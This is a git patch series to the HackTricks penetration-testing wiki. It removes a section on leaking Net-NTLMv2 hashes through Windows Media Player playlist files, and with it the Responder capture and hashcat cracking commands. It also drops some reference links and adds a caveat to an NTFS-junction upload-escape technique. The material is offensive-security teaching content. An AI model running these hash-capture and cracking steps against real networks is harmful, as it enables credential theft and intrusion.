From 9a95bc80a3c87139a5eecd7fcca0ef2cd1276e1f Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Sun, 7 Sep 2025 23:21:49 +0200 Subject: [PATCH 1/3] Update phishing-documents.md --- .../phishing-documents.md | 34 +------------------ 1 file changed, 1 insertion(+), 33 deletions(-) diff --git a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md index cb288e2fd..e08280215 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md @@ -160,38 +160,6 @@ There are several ways to **force NTLM authentication "remotely"**, for example, ../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md {{#endref}} -### Windows Media Player playlists (.ASX/.WAX) to coerce NTLM - -If a workflow automatically previews media (e.g., HR reviewing uploads) using Windows Media Player, you can leak Net-NTLMv2 by providing a playlist that references a UNC path. When WMP loads the entry, it attempts SMB access with implicit NTLM authentication. - -Example ASX payload (also supported by .WAX): - -```xml - - Leak - - - - - -``` - -Collect and crack the hash: - -```bash -# Capture Net-NTLMv2 -sudo Responder -I -# Or run via uv if you manage dependencies with it -# sudo uv run --script Responder.py -I - -# Crack (hashcat auto-detects NetNTLMv2, mode 5600) -hashcat ntlm.hash /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt -``` - -Notes -- Use ntlm_theft to generate ready-made WMP coercion files: https://github.com/Greenwolf/ntlm_theft -- If NTLM signing/SMB egress is blocked or NTLM disabled, this won’t work. Otherwise, it’s effective when targets auto-open or preview uploaded playlists. - ### NTLM Relay Don't forget that you cannot only steal the hash or the authentication but also **perform NTLM relay attacks**: @@ -256,4 +224,4 @@ Hunting/IOCs - [ntlm_theft – NTLM coercion file generator](https://github.com/Greenwolf/ntlm_theft) - [Responder](https://github.com/lgandx/Responder) -{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file +{{#include ../../banners/hacktricks-training.md}} From 442465096041302c701eee7225417ff564903c5b Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Sun, 7 Sep 2025 23:23:33 +0200 Subject: [PATCH 2/3] Remove obsolete NTLM references from phishing-documents Removed outdated references related to NTLM vulnerabilities and tools. --- .../phishing-methodology/phishing-documents.md | 4 ---- 1 file changed, 4 deletions(-) diff --git a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md index e08280215..255b6df27 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md @@ -219,9 +219,5 @@ Hunting/IOCs - [Check Point Research – ZipLine Campaign: A Sophisticated Phishing Attack Targeting US Companies](https://research.checkpoint.com/2025/zipline-phishing-campaign/) - [Hijack the TypeLib – New COM persistence technique (CICADA8)](https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661) -- [HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html) -- [Morphisec – 5 NTLM vulnerabilities: Unpatched privilege escalation threats in Microsoft](https://www.morphisec.com/blog/5-ntlm-vulnerabilities-unpatched-privilege-escalation-threats-in-microsoft/) -- [ntlm_theft – NTLM coercion file generator](https://github.com/Greenwolf/ntlm_theft) -- [Responder](https://github.com/lgandx/Responder) {{#include ../../banners/hacktricks-training.md}} From b397d462ed7d3b254b0658a97841c2dc414c5446 Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Mon, 29 Sep 2025 11:12:05 +0200 Subject: [PATCH 3/3] Update README.md --- src/pentesting-web/file-upload/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/pentesting-web/file-upload/README.md b/src/pentesting-web/file-upload/README.md index 5d37d138b..0f1d9919c 100644 --- a/src/pentesting-web/file-upload/README.md +++ b/src/pentesting-web/file-upload/README.md @@ -164,7 +164,7 @@ Note that **another option** you may be thinking of to bypass this check is to m ### Escaping upload directory via NTFS junctions (Windows) -When uploads are stored under per-user subfolders on Windows (e.g., C:\Windows\Tasks\Uploads\\) and you control creation/deletion of that subfolder, you can replace it with a directory junction pointing to a sensitive location (e.g., the webroot). Subsequent uploads will be written into the target path, enabling code execution if the target interprets server‑side code. +(For this attack you will need local access to the Windows machine) When uploads are stored under per-user subfolders on Windows (e.g., C:\Windows\Tasks\Uploads\\) and you control creation/deletion of that subfolder, you can replace it with a directory junction pointing to a sensitive location (e.g., the webroot). Subsequent uploads will be written into the target path, enabling code execution if the target interprets server‑side code. Example flow to redirect uploads into XAMPP webroot: